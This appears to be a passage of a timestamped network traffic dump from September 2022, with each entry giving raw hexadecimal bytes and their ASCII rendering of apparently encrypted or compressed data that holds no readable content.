                                                                                                                                                2022-09-29 12:51:28 UTC6451INData Raw: 67 c7 6e 65 dc 4a f5 42 03 d7 8d 33 1b c0 2b d3 48 67 d7 92 53 d5 99 0d aa 0b 4f ba 96 bf 4a ef 55 e4 7c 43 cf 52 c6 aa 0b 36 38 d3 fe d4 48 b1 ea ae d8 e2 29 80 a8 02 f8 eb 0e 22 d2 84 b9 09 d3 f4 58 87 64 6a 4b 3e 5b e9 5c a7 ee 4c 7f be 06 fe cb ab ea 59 df 59 d3 53 b2 33 6d 9c e9 de 96 c0 11 fd 3f 37 d6 0d 72 b0 ee c6 79 1e 9f d6 14 ce 93 3b bf 9e 8b 07 c1 90 49 0d 5d ef f9 c6 5c d9 78 4b 2b e2 9f 8c 27 b3 58 e6 05 6b d2 96 a8 a4 79 8d cc 4b 50 9c 57 74 ed 19 93 1a e3 62 8f f6 30 e6 ee bc 55 d7 db fb af 6a c4 0e 13 d5 0c 38 c2 3f 46 91 8a 10 b4 71 e4 02 37 1a a6 9d 51 82 cf dd 93 0e ba 03 be 7a e4 43 e3 f3 08 ea e9 ff 61 65 d3 c7 61 1d 82 b5 6a 45 2b 80 51 84 29 98 59 c3 cf 47 79 8d a7 2e f6 0f 75 7d 8a 5e f7 73 e5 a6 c7 2c 3b f7 51 41 d0 aa a4 2f 69
                                                                                                                                                Data Ascii: gneJB3+HgSOJU|CR68H)"XdjK>[\LYYS3m?7ry;I]\xK+'XkyKPWtb0Uj8?Fq7QzCaeajE+Q)YGy.u}^s,;QA/i
                                                                                                                                                2022-09-29 12:51:28 UTC6467INData Raw: ad 54 62 67 5c 4a 44 47 d2 6b 39 92 d0 bb 7d d6 45 05 4b d7 e1 bd 64 f9 98 dd 15 5e 8d 4b 7a ae df a7 fe 48 c1 cd 05 c3 d3 c2 67 b2 af b7 c1 87 a2 da 83 70 a8 c4 c2 3a ba 6d ef 70 09 78 c1 ed 13 16 35 e8 8b 22 e4 02 94 60 21 11 2c 3d f7 a9 28 b1 5d 7c 03 f4 24 d5 91 6a fa 6c 73 c8 a3 b9 1e 6c b2 be ae 14 e7 50 42 a1 50 d5 b0 02 86 f4 9a a5 46 d6 22 61 a0 38 84 bd d2 0b 8f f8 27 f5 50 92 58 66 98 79 5d e3 b0 99 dc eb 58 d6 b3 69 eb a9 10 de 73 0d 6b c0 bf b8 45 a6 00 b2 c3 cc 11 27 e8 1e 64 74 82 cd cc a9 fe a9 d0 93 87 9f b2 c2 34 b9 94 08 48 72 a3 4a 15 54 2d 52 42 3c 4f bc af 02 3c 2f a7 be 88 9a fb 69 65 3d 6a 74 20 cc 98 10 24 ee 19 fa c0 81 b1 5e e1 87 c4 7f ce eb ef ef 22 b5 4f 94 7f 96 00 63 45 4b 98 00 c1 12 32 25 de f0 6b e6 9f 78 17 1b 39 6a 7d
                                                                                                                                                Data Ascii: Tbg\JDGk9}EKd^KzHgp:mpx5"`!,=(]|$jlslPBPF"a8'PXfy]XiskE'dt4HrJT-RB<O</ie=jt $^"OcEK2%kx9j}
                                                                                                                                                2022-09-29 12:51:28 UTC6483INData Raw: 74 be 36 56 cd ed 65 85 d6 3b 9f 9a b8 f5 21 7a 85 fe 93 cf 62 fb ac cc 12 14 de c3 17 53 3a 47 74 09 6d aa 62 cc 3d 7f 6f 9d ef 87 a5 cd c8 b7 cf 45 32 71 37 f8 35 d8 9e 26 bd 9e cf ae 2c 97 4b 51 42 14 05 4a 33 5a 83 01 cb f6 8c 2d 2f c5 2c cb 81 c8 f1 71 a1 33 81 99 43 5a 18 52 66 e3 08 1c d0 74 b9 87 e2 19 df 71 7d f6 8f 64 70 75 33 47 bf 6c 0f 5d 2a 0c 5a 11 9f 92 c8 b5 f8 e7 f1 13 c9 59 9f 1d db a8 d0 97 06 f5 d2 72 1c e2 1f 00 fa d7 70 6b 19 2d 47 2d 42 08 f2 10 f7 6f ef 69 29 1e cd 36 f8 14 dd 71 bf d4 e1 ba 7a 82 2e a9 4f ad 8e 48 aa a9 c0 48 8d 63 9b 82 49 f5 fc a8 4f 7a b4 61 83 97 52 fe 79 16 65 a2 9e dd fd 21 d9 41 ac c0 e8 d9 b2 57 84 64 a0 5a a3 09 5f 1f 9d f3 0f 39 81 87 a8 9e 45 77 bb 91 7f 3e 3f 53 24 62 c7 4c 5f 87 1f ce cf 79 4d 57 83
                                                                                                                                                Data Ascii: t6Ve;!zbS:Gtmb=oE2q75&,KQBJ3Z-/,q3CZRftq}dpu3Gl]*ZYrpk-G-Boi)6qz.OHHcIOzaRye!AWdZ_9Ew>?S$bL_yMW
                                                                                                                                                2022-09-29 12:51:28 UTC6499INData Raw: 95 3c df 66 4d cf cd 50 64 54 a9 b5 3b f5 d5 6f 10 f7 65 02 da c3 a6 0e 74 e5 94 51 af d7 91 ce 61 34 31 7e 1d e7 47 3a 68 37 0c 33 20 e8 17 da 95 ff cb 23 f6 69 30 5d 93 66 b7 ec 38 c2 a8 25 9f 25 d0 b4 92 ac 08 0b 88 35 68 97 78 0c 49 99 60 47 73 4d 51 d8 7d e0 80 35 89 6c fa 30 89 5b b0 cf fb 0b 2e e2 b6 c8 80 0a 1d cc aa 04 90 3f 06 24 28 ce ef 6c bb 8b 0d 8e d4 43 45 8d 94 a2 d2 9b dc ab c7 a6 5a d3 a2 ee 9f 13 ad c1 d8 69 d9 4e da 7f 13 a3 4d 61 08 04 a1 9f 39 8d 79 ba 7f 62 9b 45 2e e8 23 e2 18 83 bf ea 6d 7e c3 71 df eb 5f e0 ad 37 16 4b 47 77 28 e6 0d ab 4a 13 93 bb cd 55 aa ff ab 6b 5d 7d d6 e8 00 c3 5f 7b 49 e2 2d 51 ab 66 33 52 78 ea ad 74 f5 65 9b f7 ed 8b f1 1b f9 be ac 34 6b 43 c9 6b 3f fb 2d 10 39 61 d6 d2 a0 97 e2 62 62 ae 5b 8f df 79 d9
                                                                                                                                                Data Ascii: <fMPdT;oetQa41~G:h73 #i0]f8%%5hxI`GsMQ}5l0[.?$(lCEZiNMa9ybE.#m~q_7KGw(JUk]}_{I-Qf3Rxte4kCk?-9abb[y
                                                                                                                                                2022-09-29 12:51:28 UTC6515INData Raw: e0 dd 2c 18 a4 42 6c 29 a1 b2 96 c0 fe b7 e7 fb 80 d4 d5 9f 7b 1d 1f 58 3b a6 bd 58 0e b0 58 36 65 d1 0d df e9 f3 55 b9 b8 b4 7a ad b8 0f 0e ea 57 c5 cb 6a 4c bd 17 fe 91 b9 8e 92 ef 23 3d 79 22 c0 4b d0 d6 02 4a 42 68 c8 e3 ca c1 46 ee 9c 4c 6d 51 c8 45 c5 97 4a a5 6f 13 41 98 82 d9 00 4b bd b2 63 53 7c c4 ad cb 0f a1 4b b0 8b dd 4b cd 5c 49 88 44 24 f6 54 43 85 9b f4 5a 48 d0 ae ce 36 4b d1 cd 2c f7 3f 74 26 56 e0 23 eb f5 46 b4 21 f8 07 71 cf 38 92 ac 47 f0 93 42 05 ac c4 95 27 65 aa f2 d2 f3 6a 30 89 35 59 ef 89 05 66 19 3a bc ee 7a 3d a9 e6 09 4f 80 21 df cf 7c 82 46 97 2f f7 ef 2c f6 02 d9 2b b1 c9 98 4e cb 63 ec 24 c3 81 ac e8 6f c1 52 1d ce 48 01 6c 32 e9 ea 61 0d fd 49 35 d9 73 fa 88 1c 63 33 ef 20 22 8b 35 fd 75 0a be ac 51 89 e6 b5 d5 6d 4d d2
                                                                                                                                                Data Ascii: ,Bl){X;XX6eUzWjL#=y"KJBhFLmQEJoAKcS|KK\ID$TCZH6K,?t&V#F!q8GB'ej05Yf:z=O!|F/,+Nc$oRHl2aI5sc3 "5uQmM
                                                                                                                                                2022-09-29 12:51:28 UTC6531INData Raw: 17 a2 9e 08 58 73 d7 67 8a 2a 11 0d b1 01 b3 4f 00 82 96 24 94 8c fc 3e cc 1a 89 ff 62 69 15 35 a8 a4 38 f5 a8 47 37 f9 e6 0b 82 32 bf 3c 20 12 9b 34 26 fe 75 e2 2c a1 ee 58 0e 24 07 4b ef 14 2e 6d d5 de e8 28 4e e1 c3 9c d3 09 89 b4 ea 3e 85 6c 8b da 83 5c bf 0f 00 ba 37 b5 d8 e1 9b 7f f6 06 af e5 32 5d 08 93 7b e6 da 49 e4 76 61 42 76 84 80 e7 9e 30 09 e8 ef bd 6d 68 40 da 31 91 71 50 2f e1 32 c5 00 a7 5b a8 92 69 3e ca 31 c5 11 c4 ff 45 4b 61 17 43 5e 3f a4 3e e2 51 7b 97 24 d1 ea 26 c8 00 74 e0 a4 0a a1 dd a5 95 17 a7 31 82 82 95 9e 6b b8 17 da 6c 9b 56 f9 be d8 b3 fc b9 90 ae 7e 9e df aa 24 66 59 f4 2b 9b d1 52 15 3d 5d f1 0c 7f cf bc cf 5b 0c 36 2c 02 1d 78 8e b1 b8 84 15 d6 2f 89 d6 44 19 45 85 d9 2e f5 9e b9 4d ef b9 bd a1 6e 1e da 8f 17 36 16 c2
                                                                                                                                                Data Ascii: Xsg*O$>bi58G72< 4&u,X$K.m(N>l\72]{IvaBv0mh@1qP/2[i>1EKaC^?>Q{$&t1klV~$fY+R=][6,x/DE.Mn6
                                                                                                                                                2022-09-29 12:51:28 UTC6547INData Raw: 13 71 14 ec 91 58 3f 37 38 88 24 65 8a e8 ae ac 99 6a 5a 51 10 4f 9d 00 a7 4c 3f 59 10 04 b9 30 d3 4c 0f 78 98 27 c6 3d 84 f9 fd 36 68 33 6b f1 c3 3a f9 1b ac d8 7a ac 86 a3 d4 d9 d1 11 4b 8e 33 47 53 d8 cf 89 1e 47 43 df 41 c4 34 b0 d6 3b d3 ff 1a bd 79 9a 47 87 a9 b6 51 01 35 fe 95 da d3 76 d8 10 20 df 5b e6 22 58 9b 21 dd f4 5e 62 b2 9e b0 ad 68 40 a9 f5 d9 05 fb 04 70 3e 2a 1d 8f 10 9f a6 49 2e 05 72 cd eb 08 b6 a6 27 2f d8 91 e0 aa f4 3a 7b d0 8f 8a ea d7 b7 ee 7e bd 22 da a9 d6 1f cd c6 86 ef e2 40 b4 1e a1 c0 cf 9b 7b 09 a9 8e d5 c2 3c 89 c1 f1 4c 52 e9 4d 09 14 37 8f c5 f1 9e f8 b0 49 34 68 cb 21 2e 65 0b 65 e5 ac 0d ca 69 46 0d 16 5d 04 b9 b0 f0 d2 c2 f1 28 39 69 b5 2d af c4 ee 45 64 31 70 f9 4f 50 05 b5 4c e5 7f 2b 14 1e 79 16 79 76 af 22 68 f5
                                                                                                                                                Data Ascii: qX?78$ejZQOL?Y0Lx'=6h3k:zK3GSGCA4;yGQ5v ["X!^bh@p>*I.r'/:{~"@{<LRM7I4h!.eeiF](9i-Ed1pOPL+yyv"h
                                                                                                                                                2022-09-29 12:51:28 UTC6563INData Raw: 2c e0 f6 9d 51 8d 55 e6 03 76 d2 f8 38 72 20 ba be 8a 08 03 91 a3 89 d6 be 26 ec ed 32 2b 91 52 f1 a9 da 22 37 dd 5e a9 0a f8 9f 29 d5 e1 a4 dc 49 eb 88 08 13 b3 21 96 b5 c8 95 08 75 67 40 1b 2a c9 d7 23 71 b3 8c b8 43 2c af d9 62 f3 a7 6e e8 d4 07 a1 b4 b9 94 2d c1 44 74 09 a8 4d 0d 6e fa 78 05 58 19 36 af 04 99 41 68 b7 84 fc 0b 11 5a bb ee 2f dd 2a 52 54 b8 d7 0d ce dc 88 81 af b6 9f 59 b7 3b a1 fa 10 54 2c 93 f1 c7 eb f1 38 1c 48 9f f4 3e 1b 55 e2 31 5a 18 ef f0 65 b8 5f de 44 3a b1 86 2a 91 41 64 0b 8f f6 8f f0 41 d2 29 c3 18 d2 88 5a 70 9b 82 da cf 45 46 2b 1f 83 d6 77 d8 ab 40 d2 9b 2d 76 d7 02 f5 06 e2 0c 82 2e 34 86 14 f5 67 b7 43 e7 a6 84 d2 57 fc 7a 0d 09 7e 37 44 9a bf 8e 8c 5f df cd a6 2c c1 eb 7d ac ca 93 07 b2 55 be fa ec 9f 85 7a 7b 72 fa
                                                                                                                                                Data Ascii: ,QUv8r &2+R"7^)I!ug@*#qC,bn-DtMnxX6AhZ/*RTY;T,8H>U1Ze_D:*AdA)ZpEF+w@-v.4gCWz~7D_,}Uz{r
                                                                                                                                                2022-09-29 12:51:28 UTC6579INData Raw: 58 f6 b2 9b a0 75 11 97 24 ac cb 39 9f 8f 74 f2 a8 ed c6 bd 27 db ec 09 8f eb 32 f8 0d b2 60 25 87 5d 96 06 8d 46 f9 73 eb 6c 7c 1e 5c 17 f8 b1 63 82 3b 4b 63 a6 9d 3f 9e 67 89 d3 57 84 ec cb 79 25 02 77 85 dd 0c 49 da eb c0 d9 0b 51 16 2f 78 f9 09 1b 98 9c eb 81 a2 fc d7 e3 17 e2 0e 70 8d 23 5f 88 d8 2a b7 60 7f cc b4 5c 05 2a a1 2e d8 3c 19 12 2d 76 26 40 1f c6 08 4b f6 60 9d 38 c3 67 e4 fe 1a 2e 72 1b de 93 ac e8 f0 8e 0e c7 b3 03 4b 3b de f5 a5 17 77 ac ab b5 5b 17 22 e8 1a fe 24 17 8a fb f5 e7 7d c3 dd cd 78 9e 49 58 36 22 32 ee ef 00 98 e6 3f 5c 3b 16 e7 38 2f 81 28 13 5e ac 24 06 dd f2 aa 64 33 37 25 cd 8e 08 39 57 7f 76 05 67 39 9d 6d 0a 85 d9 e5 4b 0e 16 35 45 4a 1c 2e 68 1f 51 5f 43 1e 34 76 c9 88 5b 30 58 b4 37 11 28 7e 88 63 4c e2 71 07 cc 4b
                                                                                                                                                Data Ascii: Xu$9t'2`%]Fsl|\c;Kc?gWy%wIQ/xp#_*`\*.<-v&@K`8g.rK;w["$}xIX6"2?\;8/(^$d37%9Wvg9mK5EJ.hQ_C4v[0X7(~cLqK
                                                                                                                                                2022-09-29 12:51:28 UTC6595INData Raw: f2 51 e5 d9 3a 46 26 3f db 5a 21 d1 53 9e bc 9b c4 9b 18 79 ae ef b8 95 90 48 0d 93 2c 4b 12 cd 61 d9 1d 3d 07 f0 df 93 b3 21 2b a0 5c 7b 2f ab 41 fc 30 d6 47 f1 60 f4 42 e1 23 6f 19 00 d8 ff 8d 01 b0 0e ca 32 96 de 17 61 76 77 fc dd bf 1f 0a 96 4d e5 2f 56 c4 bf a4 87 04 c5 0a 91 d8 08 1a 5c 00 22 0c b3 0c a4 6b 34 07 02 58 92 78 01 9f 96 a0 4f 89 ac ef cb 5d 97 1e bc 0d b8 f2 74 f6 2f 4f da d2 cd 29 0e a0 34 7e 57 3e 66 ee 78 52 5a fa 1b d6 eb 03 34 7b cc 76 48 06 83 e8 6c 7f 57 0e e7 68 bd a3 3a 6f 46 aa f8 fa d2 34 f3 ca f8 18 b4 09 b3 12 f4 1b 7a f2 fa ec 53 17 fe cc 06 a9 84 d4 9e 85 49 09 68 e1 3c 2b 1e b1 ca 83 8e 92 31 6b 2d 26 70 55 13 47 e3 57 02 2e 91 d9 85 93 2f 67 0f a5 41 ad 13 e6 3a c1 94 22 bb c6 62 8e ed 6c e6 5e 5b 64 5d 8c f9 73 67 7b
                                                                                                                                                Data Ascii: Q:F&?Z!SyH,Ka=!+\{/A0G`B#o2avwM/V\"k4XxO]t/O)4~W>fxRZ4{vHlWh:oF4zSIh<+1k-&pUGW./gA:"bl^[d]sg{
                                                                                                                                                2022-09-29 12:51:28 UTC6611INData Raw: cb ca e9 2a f8 d5 98 cf 14 da de b2 18 80 e2 4e 2b 04 80 7c be c1 36 48 a1 c0 09 b4 5b d1 9f f1 c9 48 c0 b0 92 1f 6b 2c 82 4e 16 52 42 15 0a 5a 0f 46 41 91 fa e9 4a 21 e6 61 71 70 75 e5 22 e7 0d b9 38 64 45 40 d7 0f 8c 89 4f ec 9f f9 53 84 7d 23 72 1b 6e aa 76 03 02 70 0f 9f fd 49 3c b6 06 ae a6 e4 3c 69 18 7c 85 13 a3 b6 db 13 65 af 9c 47 8b a5 17 78 58 2b e0 a9 78 f7 b2 0b dd 8c 63 69 8e 2d 1c 2d 4c b0 6b 25 81 69 58 72 6b 94 02 d6 24 d7 94 7c bf 75 87 7b 4e 39 dd 9c 4f d2 26 b7 d4 1d 4d a1 93 90 23 b9 2c ee 1a bf 1d 6e be eb 20 de 78 2b 13 6e 84 7d 18 c6 a3 4e fb b5 a4 96 60 92 80 3f 31 bd f9 53 62 92 0a 9c 41 27 74 c4 f5 6e cc 27 84 65 98 6f 2b a0 77 9e 0f 06 d9 45 36 38 3a ef 4e 61 b9 e3 70 02 1e 8e 46 56 0a 4d fc 5e 2f 7a 8c cd 5e b1 ee 2e 3c 4f 72
                                                                                                                                                Data Ascii: *N+|6H[Hk,NRBZFAJ!aqpu"8dE@OS}#rnvpI<<i|eGxX+xci--Lk%iXrk$|u{N9O&M#,n x+n}N`?1SbA'tn'eo+wE68:NapFVM^/z^.<Or
                                                                                                                                                2022-09-29 12:51:28 UTC6627INData Raw: 19 02 6c 6c cb b2 bc e0 9f cb 5e bb 43 b3 54 36 84 35 0b bf 6f 30 ff 32 f6 2c 9c 10 ca 34 a3 06 30 11 e4 3a f6 a0 62 a6 46 5b 5b 90 cb 62 ca 3d 5e db 45 e1 b7 d7 f2 c5 4f b0 b7 c9 97 bd 13 8e 4f 2e 8c 6d 02 4c d3 b0 04 d7 3b 82 01 af 22 4d d6 5b 09 62 88 2a c2 34 c4 ec 3b 97 56 ef 07 53 12 91 41 20 6a 56 56 b9 16 27 c4 04 84 a9 45 4f a6 08 d0 ed 7f 32 13 16 86 b5 d4 be 2c e5 1a be 0f 32 f7 65 3b eb 7d e3 87 f3 df 43 41 67 d0 9c ea 76 c7 57 eb 79 22 8c 1e 3a dd 77 ba e0 03 be 0f 04 01 ef af 16 fa bc c3 91 99 9a 07 68 be 81 66 8d a1 c8 72 29 f4 47 06 3b 87 05 19 ca 14 fc 54 40 3b 00 5b 38 94 c3 9f fc fb 1d be 36 88 29 02 e0 17 59 54 37 63 32 8e 45 ca f2 e3 b5 d2 bf b6 29 b0 9b 6d fb 70 5f b9 5e 86 cd 94 80 17 b7 f1 4c 1e ee 25 76 ec 9e 44 94 91 0b 1f 93 39
                                                                                                                                                Data Ascii: ll^CT65o02,40:bF[[b=^EOO.mL;"M[b*4;VSA jVV'EO2,2e;}CAgvWy":whfr)G;T@;[86)YT7c2E)mp_^L%vD9
                                                                                                                                                2022-09-29 12:51:28 UTC6643INData Raw: b2 a6 5f 57 b6 cf 7f 21 1b 25 3e cd 0c cc d2 15 bb 86 85 f7 a3 c7 c6 cf 11 6d 53 a9 48 93 09 d3 22 a5 38 03 07 f9 de c6 f9 97 6a e0 5c bd 8a 6a 78 80 a6 40 a5 f8 95 c7 01 47 cc 23 6b 53 55 eb 63 30 75 0e aa fe b6 78 1f c6 41 66 4a 62 fd 17 56 33 59 dd e1 90 b5 e2 e1 4e d9 61 2c f0 c3 29 9c e8 8a 42 48 19 0d a4 e3 ec 4c 8d 76 67 6f e1 9a 98 61 31 3f ef e5 15 db b0 46 d2 72 35 48 f0 56 bf 87 43 ed ef bf b6 ed 16 f8 cd 4c 89 61 84 29 63 4a 40 78 3e 17 f2 4f 1a 53 e3 18 40 3c 03 4a 02 60 6f 2d 57 6d ed 07 e4 0e 0f 6b 72 e7 47 3a 3c e3 f2 3b 3b df f3 a9 50 e3 9f 65 31 40 cd 12 96 35 6d d9 dc 1d 9d b5 f9 18 b0 92 1e 3a 6f 58 0f 71 3a 9a b9 8a 7d 10 33 30 b5 3e 00 21 06 5a 6f 42 2e 4e 20 26 45 67 1f 17 2b ed 3a 0b 29 93 dc e0 a0 64 8c 2c dc 75 ae e4 c1 d7 58 1d
                                                                                                                                                Data Ascii: _W!%>mSH"8j\jx@G#kSUc0uxAfJbV3YNa,)BHLvgoa1?Fr5HVCLa)cJ@x>OS@<J`o-WmkrG:<;;Pe1@5m:oXq:}30>!ZoB.N &Eg+:)d,uX
                                                                                                                                                2022-09-29 12:51:28 UTC6659INData Raw: 72 28 38 28 e4 16 76 4b 78 10 6a 9b 90 d2 f8 2b 4d 10 ae 7b 10 96 c0 d8 8a 95 09 2b c0 85 a9 0f ef 26 3a fa e3 76 55 03 91 a8 36 4b 72 07 9d bd 59 5c 82 0b 53 1a 52 81 45 e4 ef 6f d0 2c f5 4c cf 25 0f c5 3b d2 77 83 a0 c2 15 1a cd 30 ec 29 ca fd 5d 9b 4f 84 69 1e 56 0e bf c0 5a fe ea 5d f7 02 3b 54 74 ca a3 fd d9 27 1f bb 66 c9 20 4e 97 30 b9 cf d5 2e 29 db d8 00 e6 28 12 30 cc ac 4f 40 6b 57 78 aa 10 ab d4 cd 56 81 25 cc 3e c5 f4 05 8c fb 1a 82 54 1b 3b 9d a7 aa 43 cc 00 b8 b0 48 2e 8f 6f 8f 5e d5 0b e7 66 15 4f 4c 94 b0 c2 7b b0 0e 49 d1 b4 ce fc 9a 53 72 dc 9d 2b 75 0b 8b 75 5a ef 8f 58 b5 09 47 bc 43 42 b3 1f 18 38 b7 3a 21 e7 16 00 01 dc 86 b4 af 7c 48 54 b3 ef 62 be 8d 1d 85 a0 87 3c e7 88 71 be a8 0a 1c 49 1d c7 af 7f cf 71 a9 25 38 49 df f4 db 36
                                                                                                                                                Data Ascii: r(8(vKxj+M{+&:vU6KrY\SREo,L%;w0)]OiVZ];Tt'f N0.)(0O@kWxV%>T;CH.o^fOL{ISr+uuZXGCB8:!|HTb<qIq%8I6
                                                                                                                                                2022-09-29 12:51:28 UTC6675INData Raw: a9 99 61 68 2b 89 00 d3 34 7a 35 54 59 5b d4 9e d0 17 5e d4 79 55 c8 45 b2 9a 4f 77 f0 1e 52 f5 63 1f 9d 44 e1 7e 9b b3 0e 1c 33 3f a4 90 53 71 8d 18 51 d0 44 cc 5e 29 39 5c c8 46 50 3f c5 b0 2a 8e f2 8c e1 e2 f8 9e 69 89 ed 77 ce 3c 52 30 6c c5 c3 29 f1 77 b1 c1 3e fb d8 b0 98 61 dd 59 07 16 df 75 84 91 71 6f 9e a2 99 30 62 72 3f f9 7c 89 97 28 72 cc 9f 22 f2 41 29 d4 10 a4 8b d1 b8 78 8f 61 57 62 d1 62 26 17 07 ec ed 5b 51 31 ac 0d 53 25 30 15 e9 3e a1 21 2f ae 8e 2e 23 13 9f ab a6 e2 67 a4 8c 5b ba 2e 71 82 97 53 d3 5d 0f 50 3c 2c 52 99 f6 73 49 83 a1 7f f7 cd 7d bb 0b 93 63 35 ae 40 ba 5a e5 64 86 10 e8 b8 b6 47 bb e7 fe c7 e9 92 c9 0a 8f 86 fd 37 1f ce 3b 4a cc d4 10 86 a9 cc 79 a7 b1 48 91 ca 5b 1b 79 c3 86 36 00 d0 b2 83 75 b9 9d e0 e4 2e a7 2e 23
                                                                                                                                                Data Ascii: ah+4z5TY[^yUEOwRcD~3?SqQD^)9\FP?*iw<R0l)w>aYuqo0br?|(r"A)xaWbb&[Q1S%0>!/.#g[.qS]P<,RsI}c5@ZdG7;JyH[y6u..#
                                                                                                                                                2022-09-29 12:51:28 UTC6691INData Raw: a5 ff e0 ca ab 7f 60 d3 c2 0c d7 df d1 52 c8 d6 d7 4b 1d b7 0a 48 ae e3 d5 be b1 02 c0 2a de 1c 7e dc 2e 40 07 12 10 85 d3 79 52 32 c9 32 3d 21 9e b1 a4 8b 72 6f 70 59 3c da 90 c9 5c cc b8 18 00 f7 0c 56 ca ec b7 74 72 42 da 47 6e 30 c1 bc a4 f8 37 fc a3 68 62 af a2 f2 06 a7 4a 0b 6a fa a1 c1 d1 b3 91 c6 5f 65 0f 10 5d cf 0d e2 05 79 7f ff 5d c3 52 91 a4 b6 89 10 e7 12 05 cb ec 20 1c bd 7f 85 10 10 73 89 73 41 72 98 e1 2c f4 47 b9 6e 9e b3 c6 5b f2 c4 e5 9e 5b 57 f6 a8 86 42 6f a8 08 7c 1b 88 75 ef 69 3f 3b 0f 13 3d 95 16 eb e3 f3 9e 7d ed be 1e 49 c2 36 f1 d4 d1 b8 6f a3 7e fc 75 41 d1 82 c8 ca 0e e2 10 76 1e 72 6b a3 1a ea 7b 7b 6f 7f 3c 74 2c 3f 24 3a 49 be 2f 2b cc d7 c7 ad 72 e4 88 ea 9d 3d 66 13 2e 09 e6 5e 80 63 0f 41 83 86 e5 f2 ac 60 7d 0c 8e dc
                                                                                                                                                Data Ascii: `RKH*~.@yR22=!ropY<\VtrBGn07hbJj_e]y]R ssAr,Gn[[WBo|ui?;=}I6o~uAvrk{{o<t,?$:I/+r=f.^cA`}
                                                                                                                                                2022-09-29 12:51:28 UTC6707INData Raw: bb c4 e5 b7 5b 2f 1f 7a ce 36 87 7c cb 13 6e 41 f1 47 0e 42 22 ef a8 96 62 04 82 6c bf b9 c5 3e 5f b3 56 72 0c 64 dc d5 16 5d 84 cc 75 8a 86 f4 24 36 78 d9 0c b3 8f be 18 8d fc 7e f0 a2 03 7b fd 9b ad 98 01 c6 23 81 ad 1e 80 35 22 e2 cc 62 30 d4 f3 36 72 bd 56 96 df 3f 92 28 77 e2 84 d3 de 6f 7e 5b 97 56 30 5e 12 41 40 63 96 7c 85 17 8a 9f 60 22 8d 2c b8 ca 77 39 a0 69 35 7b f4 ce 17 cb d5 c1 a4 73 02 4c 04 9d 8a 07 4a 36 3b 34 cf 9a ca 0d 77 da 4f 66 a7 62 58 56 b5 ee d0 6a bb c4 3d 36 f8 35 ad 12 e2 55 d2 b3 87 aa 74 4d ac 7e 43 00 58 a7 5f ea 43 33 77 d1 ed d7 35 21 f3 4a 26 78 51 00 22 de 79 9d f8 07 9f fc f1 95 15 28 0a 05 16 38 ad 25 9e be 9c 52 e1 e3 41 83 5f 04 82 e4 76 f7 38 03 18 d5 c3 a3 43 aa 72 2b 45 da a1 3d 74 66 8b 25 fb 45 8d af 17 2e f0
                                                                                                                                                Data Ascii: [/z6|nAGB"bl>_Vrd]u$6x~{#5"b06rV?(wo~[V0^A@c|`",w9i5{sLJ6;4wOfbXVj=65UtM~CX_C3w5!J&xQ"y(8%RA_v8Cr+E=tf%E.
                                                                                                                                                2022-09-29 12:51:28 UTC6723INData Raw: 62 03 f9 4a 3a ba b8 36 18 2a ca c2 d8 b8 9f 3c ec fb 14 64 86 4b 3a b3 62 73 53 f6 af 8e d0 17 f4 99 04 2c 62 05 ce 6e 2a fd e4 fa 8b a6 32 60 d0 b7 72 d5 3a ec 29 40 3a 01 e2 8c 43 87 2f 66 ff 66 f7 f0 ba 8a 2e 0e b4 84 f1 09 5f a3 d7 9d df 1a 3a 13 30 7e 21 c9 a0 93 5f 9e 61 8c ea 87 bd d5 98 b3 b7 fe 54 eb c8 a4 63 83 06 a4 03 03 c7 ce 51 c8 37 a1 68 a0 ae e7 89 f3 33 ae 15 d8 c8 d3 8c 55 7d e0 c0 db 06 2c 7b d7 29 e1 45 cf 27 7a 2a af 7c 41 d1 8d 8f ec 5d 9c 2b 2a 8a c4 36 7b e8 67 86 ac fc 11 5e b6 1b 3c 9a 41 7c f9 ac d4 d4 f4 58 3d ca 9a 85 8c 64 e2 26 7c 41 78 be 07 6c c4 94 47 f2 35 5f c7 aa 86 40 d5 27 72 b1 dd 51 da d2 b7 56 fb eb e6 71 12 d0 d3 43 36 fb be e4 2a 32 5d ae cf 62 2c d8 6d 81 c4 d6 d2 4b 48 42 19 a2 fe ed f0 83 a4 83 f3 31 52 b4
                                                                                                                                                Data Ascii: bJ:6*<dK:bsS,bn*2`r:)@:C/ff._:0~!_aTcQ7h3U},{)E'z*|A]+*6{g^<A|X=d&|AxlG5_@'rQVqC6*2]b,mKHB1R
                                                                                                                                                2022-09-29 12:51:28 UTC6728INData Raw: dd 17 db 8a 44 3d a6 f7 8d 56 85 6f 28 a0 7d 85 63 b1 0e 56 8e f0 17 e5 2c 9f 6d 52 71 0e 98 fa 78 fd ec 56 83 c7 f2 c1 07 93 62 07 c5 ff c5 70 da bd 0b 43 1f dc e8 e9 57 4f cb 71 d1 54 38 9f 6e 59 af 86 15 70 40 b6 ad e1 94 74 4d c5 a0 15 f8 97 a7 62 02 4e 20 80 0f 64 54 8f 43 ec a4 80 78 9d cc 16 51 76 c0 84 e2 5d 28 f2 b3 6a 62 c5 35 5b 1a 82 bb 81 14 a9 5c 3d 07 73 22 d1 8f cc 3e f1 e4 ba f0 56 a4 89 b4 08 00 63 48 cb a9 03 13 d0 8d 9f 6a 11 be 22 74 22 3f 21 f4 2f fe 69 79 a0 1c 07 a8 6e ce c5 4b ec d7 47 b9 86 46 5f 44 4f 4d e3 c1 d8 b0 d1 95 af 32 00 33 6f 7c fa b5 5c 8a d3 8f d1 3d 0d 94 da b3 f1 80 a0 15 36 f3 16 ed 59 dd f8 ad 60 dc ac 01 a5 71 7f 09 03 cd cd 81 f1 10 fd 54 ad 26 ec 80 d8 9e 6a e2 78 07 b4 62 9b 60 28 8a a9 7d 5d 83 f0 eb dd 09
                                                                                                                                                Data Ascii: D=Vo(}cV,mRqxVbpCWOqT8nYp@tMbN dTCxQv](jb5[\=s">VcHj"t"?!/iynKGF_DOM23o|\=6Y`qT&jxb`(}]
